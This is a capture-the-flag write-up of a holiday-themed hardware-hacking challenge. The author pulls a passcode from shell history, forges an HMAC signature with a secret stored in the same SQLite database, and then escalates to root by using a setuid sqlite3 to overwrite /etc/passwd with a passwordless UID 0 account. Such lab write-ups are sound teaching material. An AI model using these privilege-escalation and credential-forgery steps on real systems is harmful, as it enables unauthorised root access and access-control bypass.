Hardware Hacking 101 - Part 2

Difficulty: ❄ ❄ ❄ ❄

Santa's gone missing, and the only way to track him is by accessing the Wish List in his chest: modify the access_cards database to gain entry!

Hints

It’s In the Signature

From: Jewel Loggins
I seem to remember there being a handy HMAC generator included in CyberChef.

Hidden in Plain Sight

From: Jewel Loggins
It is so important to keep sensitive data like passwords secure. Oftentimes, when typing passwords into a CLI (Command Line Interface), they get added to log files and other easy-to-access locations. It makes it trivial to step back in history and identify the password.

Silver Trophy

The Santa's Little Helper - Access Card Maintenance Tool needs a password to modify the cards:

--------------------------------------------------------
                   ___     _      _  _   
                  / __|   | |    | || |  
                  \__ \   | |__  | __ |  
                  |___/   |____| |_||_|  
                _|"""""|_|"""""|_|"""""| 
                "`-0-0-'"`-0-0-'"`-0-0-' 
--------------------------------------------------------
  Santa's Little Helper - Access Card Maintenance Tool

          Tool Name: slh

options:
  -h, --help            show this help message and exit
  --view-config         View current configuration.
  --view-cards          View current values of all access cards.
  --view-card ID        View a single access card by ID.
  --set-access ACCESS_LEVEL
                        Set access level of access card. Must be 0 (No Access) or 1 (Full Access).
  --id ID               ID of card to modify.
  --passcode PASSCODE   Passcode to make changes.
  --new-card            Generate a new card ID.
--------------------------------------------------------
slh@slhconsole> slh --view-card 42
Details of card with ID: 42
(42, 'c06018b6-5e80-4395-ab71-ae5124560189', 0, 'ecb9de15a057305e5887502d46d434c9394f5ed7ef1a51d2930ad786b02f6ffd')
slh@slhconsole> slh --set-access 1 --id 42
Invalid passcode. Access not granted.

After a little bit of poking around, I found the passcode in the shell history:

slh@slhconsole> history | grep slh
    9  slh --help
   11  slh --passcode CandyCaneCrunch77 --set-access 1 --id 143
   31  history | grep slh

Changing card 42's access level with that passcode granted the Silver trophy:

slh@slhconsole> slh --passcode CandyCaneCrunch77 --set-access 1 --id 42

       *   *   *   *   *   *   *   *   *   *   *
   *                                             *
*      ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄     *
 *  $$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$$\  $$$$$$\   $$$$$$\  * 
  * $$  __$$\ $$  __$$\ $$  __$$\ $$  _____|$$  __$$\ $$  __$$\ *
   *$$ /  $$ |$$ /  \__|$$ /  \__|$$ |      $$ /  \__|$$ /  \__| *
    $$$$$$$$ |$$ |      $$ |      $$$$$\    \$$$$$$\  \$$$$$$\   
   *$$  __$$ |$$ |      $$ |      $$  __|    \____$$\  \____$$\  *
  * $$ |  $$ |$$ |  $$\ $$ |  $$\ $$ |      $$\   $$ |$$\   $$ | *
*   $$ |  $$ |\$$$$$$  |\$$$$$$  |$$$$$$$$\ \$$$$$$  |\$$$$$$  |   *
 *  \__|  \__| \______/  \______/ \________| \______/  \______/  *
*         *    ❄             ❄           *        ❄    ❄    ❄   *
   *        *     *     *      *     *      *    *      *      *
   *  $$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\ $$$$$$$$\ $$$$$$$$\ $$$$$$$\  $$\  *
   * $$  __$$\ $$  __$$\ $$  __$$\ $$$\  $$ |\__$$  __|$$  _____|$$  __$$\ $$ | *
  *  $$ /  \__|$$ |  $$ |$$ /  $$ |$$$$\ $$ |   $$ |   $$ |      $$ |  $$ |$$ |*
  *  $$ |$$$$\ $$$$$$$  |$$$$$$$$ |$$ $$\$$ |   $$ |   $$$$$\    $$ |  $$ |$$ | *
 *   $$ |\_$$ |$$  __$$< $$  __$$ |$$ \$$$$ |   $$ |   $$  __|   $$ |  $$ |\__|*
  *  $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |\$$$ |   $$ |   $$ |      $$ |  $$ |   *
*    \$$$$$$  |$$ |  $$ |$$ |  $$ |$$ | \$$ |   $$ |   $$$$$$$$\ $$$$$$$  |$$\ *
 *    \______/ \__|  \__|\__|  \__|\__|  \__|   \__|   \________|\_______/ \__|  *
  *                                                            ❄    ❄    ❄   *
   *      *    *    *    *    *    *    *    *    *    *    *    *    *    *                                                                                                                                        

Card 42 granted access level 1.

Gold Trophy

For the Gold trophy, I followed Jewel's hint again: “There’s a tougher route if you’re up for the challenge to earn the Gold medal. It involves directly modifying the database and generating your own HMAC signature.”
Looking at the files, I found that access_cards is a SQLite database:

slh@slhconsole> ls
access_cards
slh@slhconsole> file access_cards
access_cards: SQLite 3.x database, last written using SQLite version 3040001, file counter 4, database pages 32, cookie 0x2, schema 4, UTF-8, version-valid-for 4

Inspecting its contents, I found a config table containing the HMAC secret and the expected message format:

slh@slhconsole> sqlite3 access_cards
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
access_cards  config      
sqlite> SELECT * FROM config;
1|hmac_secret|9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e
2|hmac_message_format|{access}{uuid}
3|admin_password|3a40ae3f3fd57b2a4513cca783609589dbe51ce5e69739a33141c5717c20c9c1
4|app_version|1.0

A very quick Python script later, I had the signature:

import hmac
import hashlib

# hmac_secret from the config table, used as the raw ASCII bytes of the hex string
secret_key = b"9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e"
# Message follows hmac_message_format {access}{uuid}: access level 1 followed by card 42's UUID
access_uuid = b"1c06018b6-5e80-4395-ab71-ae5124560189"
signature = hmac.new(secret_key, access_uuid, hashlib.sha256).hexdigest()
print("signature = {0}".format(signature))
(env) thedead@maccos act1-hardware-hacking % python3 generateSignature.py
signature = 135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096

Updating the SQLite database accordingly got me the Gold:

slh@slhconsole> sqlite3 access_cards 'UPDATE access_cards SET access = 1, sig = "135a32d5026c5628b1753e6c67015c0f04e26051ef7391c2552de2816b1b7096" WHERE id = 42;'
       *   *   *   *   *   *   *   *   *   *   *
   *                                             *
*      ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄  ❄     *
 *  $$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$$\  $$$$$$\   $$$$$$\  * 
  * $$  __$$\ $$  __$$\ $$  __$$\ $$  _____|$$  __$$\ $$  __$$\ *
   *$$ /  $$ |$$ /  \__|$$ /  \__|$$ |      $$ /  \__|$$ /  \__| *
    $$$$$$$$ |$$ |      $$ |      $$$$$\    \$$$$$$\  \$$$$$$\   
   *$$  __$$ |$$ |      $$ |      $$  __|    \____$$\  \____$$\  *
  * $$ |  $$ |$$ |  $$\ $$ |  $$\ $$ |      $$\   $$ |$$\   $$ | *
*   $$ |  $$ |\$$$$$$  |\$$$$$$  |$$$$$$$$\ \$$$$$$  |\$$$$$$  |   *
 *  \__|  \__| \______/  \______/ \________| \______/  \______/  *
*         *    ❄             ❄           *        ❄    ❄    ❄   *
   *        *     *     *      *     *      *    *      *      *
   *  $$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\ $$$$$$$$\ $$$$$$$$\ $$$$$$$\  $$\  *
   * $$  __$$\ $$  __$$\ $$  __$$\ $$$\  $$ |\__$$  __|$$  _____|$$  __$$\ $$ | *
  *  $$ /  \__|$$ |  $$ |$$ /  $$ |$$$$\ $$ |   $$ |   $$ |      $$ |  $$ |$$ |*
  *  $$ |$$$$\ $$$$$$$  |$$$$$$$$ |$$ $$\$$ |   $$ |   $$$$$\    $$ |  $$ |$$ | *
 *   $$ |\_$$ |$$  __$$< $$  __$$ |$$ \$$$$ |   $$ |   $$  __|   $$ |  $$ |\__|*
  *  $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |\$$$ |   $$ |   $$ |      $$ |  $$ |   *
*    \$$$$$$  |$$ |  $$ |$$ |  $$ |$$ | \$$ |   $$ |   $$$$$$$$\ $$$$$$$  |$$\ *
 *    \______/ \__|  \__|\__|  \__|\__|  \__|   \__|   \________|\_______/ \__|  *
  *                                                            ❄    ❄    ❄   *
   *      *    *    *    *    *    *    *    *    *    *    *    *    *    *         
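As an added illustration (not code from the post or from the challenge), here is a small re-creation of the scheme the config table describes: the message is built from hmac_message_format, keyed with hmac_secret, and checked with a constant-time compare. The table column names are assumed. It also shows why keeping the secret in the same database as the signed rows leaves a check_hmac-style verifier with nothing to detect once the database file is writable.

```python
import hashlib
import hmac
import sqlite3

# Constructed in-memory copy of the two tables shown in the post; the column
# names are assumed, since the post only shows raw rows.
SCHEMA = """
CREATE TABLE config (id INTEGER PRIMARY KEY, key TEXT, value TEXT);
CREATE TABLE access_cards (id INTEGER PRIMARY KEY, uuid TEXT, access INTEGER, sig TEXT);
INSERT INTO config VALUES
  (1, 'hmac_secret', '9ed1515819dec61fd361d5fdabb57f41ecce1a5fe1fe263b98c0d6943b9b232e'),
  (2, 'hmac_message_format', '{access}{uuid}');
"""
CARD_UUID = "c06018b6-5e80-4395-ab71-ae5124560189"  # card 42 from the post

def load_config(conn):
    return dict(conn.execute("SELECT key, value FROM config"))

def sign_card(secret, fmt, access, uuid):
    # Message comes from the stored format string ("1" + uuid for full access);
    # as in the post, the hex secret is keyed as ASCII bytes, not hex-decoded.
    msg = fmt.format(access=access, uuid=uuid).encode()
    return hmac.new(secret.encode(), msg, hashlib.sha256).hexdigest()

def verify_card(secret, fmt, row):
    card_id, uuid, access, sig = row
    # Constant-time comparison, so timing does not reveal how many bytes matched.
    return hmac.compare_digest(sign_card(secret, fmt, access, uuid), sig)

def audit(conn):
    # What a check_hmac-style verifier can conclude from the database alone.
    cfg = load_config(conn)
    rows = conn.execute("SELECT id, uuid, access, sig FROM access_cards")
    return {r[0]: verify_card(cfg["hmac_secret"], cfg["hmac_message_format"], r) for r in rows}

def demo():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    cfg = load_config(conn)
    secret, fmt = cfg["hmac_secret"], cfg["hmac_message_format"]
    # Seed card 42 as a no-access card carrying a signature the verifier accepts.
    conn.execute("INSERT INTO access_cards VALUES (42, ?, 0, ?)", (CARD_UUID, sign_card(secret, fmt, 0, CARD_UUID)))
    genuine = audit(conn)
    # Flip access without touching sig: the stored signature no longer verifies.
    conn.execute("UPDATE access_cards SET access = 1 WHERE id = 42")
    tampered = audit(conn)
    # Re-sign with the secret from the same database: it verifies again, so the HMAC adds nothing once the file is writable.
    conn.execute("UPDATE access_cards SET sig = ? WHERE id = 42",
                 (sign_card(secret, fmt, 1, CARD_UUID),))
    return genuine, tampered, audit(conn)
```

Calling demo() returns the three audit results in order: genuine row accepted, tampered row rejected, re-signed row accepted again.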

Funsies

I have no name!@slhconsole>

It took me some time to realize I just had to use the already available hmac_secret; while looking around, I found the file /entrypoint.sh:

slh@slhconsole> cat /entrypoint.sh
#!/bin/bash

# Run the HMAC checking as root
/root/check_hmac &

# Get the PID of the background process if needed
HMAC_PID=$!

# Switch to the slh user to run the main application
su -c "/usr/bin/main" slh

# Optionally wait for the background process (HMAC checking script)
wait $HMAC_PID

This file referred to /root/check_hmac, but I didn’t have the rights to access it:

slh@slhconsole> file /root/check_hmac
/root/check_hmac: cannot open `/root/check_hmac' (Permission denied)

So I went looking for setuid executables and found that sqlite3 was one of them:

slh@slhconsole> find / -perm -4000 -print 2>/dev/null
/usr/bin/chsh
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/sqlite3
/usr/bin/slh

I then wrote myself a UID 0 user into /etc/passwd and elevated privileges:

slh@slhconsole> sqlite3 /dev/null -cmd ".output /etc/passwd" 'select "thedead::0:0:root:/root:/bin/bash";'
slh@slhconsole> su thedead
bash: cannot set terminal process group (9): Inappropriate ioctl for device
bash: no job control in this shell
thedead@98d3ae5e5586:/home/slh# file /root/check_hmac 
/root/check_hmac: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4900f1057c817d78f6abf8c33793107b79dcd1a7, for GNU/Linux 2.6.32, stripped

Obviously, that led to nothing, but when I exited and restarted the terminal I was greeted by a nice user called "I have no name!" (the original post shows this as an animated GIF). Bash prints that prompt when the current UID has no /etc/passwd entry to resolve a name from, which is exactly what the .output redirection left behind after overwriting the file with my single line.

No route to hose

In:    elvenconsole@1e000c00
Out:   elvenconsole@1e000c00
Err:   elvenconsole@1e000c00
Net:   
Warning: eth@1e100000 (eth0) using random MAC address - 5e:69:c8:f8:cf:5b
eth0: eth@1e100000
Hit any key to stop autoboot:  0 
Reindeer_PCIE_SET: gpio[19]=1
Using eth@1e100000 device
TFTP from server 192.168.54.25; our IP address is 192.168.54.5
Filename 'magic_firmware.bin'.
Load address: 0x80010000
Loading: *
North Pole Retry count exceeded; starting again

=> ping 127.0.0.1
Not route to hose
This post is licensed under CC BY 4.0 by the author.